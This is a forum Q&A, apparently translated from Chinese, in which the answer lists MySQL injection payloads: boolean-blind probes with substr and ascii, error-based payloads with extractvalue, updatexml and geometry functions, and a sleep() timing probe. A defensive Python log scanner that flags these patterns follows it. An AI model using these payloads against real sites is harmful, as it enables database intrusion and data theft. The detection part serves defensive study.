@秒灵儿
asked 4 years ago
1 answer

Functions commonly used for injection and bypass

Which functions are commonly used for injection and bypass?

上官雨宝
4 years ago

1) Boolean-based blind SQL injection

left(database(),1)>'s'

ascii(substr((select table_name information_schema.tables where tables_schema=database()limit 0,1),1,1))=101 --+

ascii(substr((select database()),1,1))=98

ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23

regexp (regular-expression) injection: select user() regexp '^[a-z]';

select user() like 'ro%'

2) Error-based blind SQL injection

1) and extractvalue(1, concat(0x7e,(select @@version),0x7e))

2) Error via floor() (rounds down)

3) +and updatexml(1, concat(0x7e,(select @@version),0x7e),1)

4) geometrycollection(): select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5) multipoint(): select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6) polygon(): select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7) multipolygon(): select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8) linestring(): select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9) multilinestring(): select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10) exp(): select * from test where id=1 and exp(~(select * from(select user())a));

3) How is time-based (delay) injection detected?

if(ascii(substr("hello", 1, 1))=104, sleep(5), 1)
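From the defender's side, the function names the answer above lists are exactly the tokens worth alerting on in web access logs. The following is an added example, not part of the original answer: a small Python classifier that groups those signatures by technique (boolean-blind, error-based, time-based), normalises URL encoding and inline comments before matching, and runs over constructed log lines. The grouping, pattern set and sample log are this example's own assumptions; `floor(rand(` is assumed for the "floor error" entry.

```python
import re
from urllib.parse import unquote_plus

# Signatures grouped by the technique the answer lists. The grouping and the
# pattern set are this example's own; floor(rand( is assumed for "floor error".
TECHNIQUE_PATTERNS = {
    "boolean-blind": [r"\b(?:left|substr|substring|mid|ascii|ord)\s*\(",
                      r"\b(?:regexp|like)\s+'"],
    "error-based": [r"\b(?:extractvalue|updatexml)\s*\(",
                    r"\bfloor\s*\(\s*rand\s*\(",
                    r"\b(?:geometrycollection|multipoint|polygon|multipolygon|linestring|multilinestring)\s*\(",
                    r"\bexp\s*\(\s*~"],
    "time-based": [r"\b(?:sleep|benchmark)\s*\("],
}
COMPILED = {t: [re.compile(p, re.I) for p in ps] for t, ps in TECHNIQUE_PATTERNS.items()}

def normalise(value):
    """Decode URL encoding (twice, to catch double-encoded input) and collapse
    inline /* */ comments and whitespace so the patterns see plain tokens."""
    v = unquote_plus(unquote_plus(value))
    v = re.sub(r"/\*.*?\*/", " ", v)
    return re.sub(r"\s+", " ", v)

def classify(value):
    """Return the set of technique labels whose signatures occur in a parameter value."""
    v = normalise(value)
    return {t for t, pats in COMPILED.items() if any(p.search(v) for p in pats)}

def scan_log(lines):
    """Return (line, techniques) for each access-log line whose query string matches."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m or "?" not in m.group(1):
            continue
        found = classify(m.group(1).split("?", 1)[1])
        if found:
            hits.append((line, found))
    return hits

# Constructed access-log lines: one benign request and three carrying payloads from the answer.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /item?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /item?id=1%20and%20ascii(substr((select%20database()),1,1))=98 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /item?id=1%20and%20extractvalue(1,concat(0x7e,(select%20@@version),0x7e)) HTTP/1.1" 500 120',
    '203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /item?id=1%20and%20if(ascii(substr(%22hello%22,1,1))=104,sleep(5),1) HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for line, found in scan_log(SAMPLE_LOG):
        print(sorted(found), line)
```

Pattern matching on parameters is a triage aid, not a substitute for parameterised queries; pair it with the HTTP status (error-based probes often show as 500s, as in the third sample line) and request timing for the sleep() case.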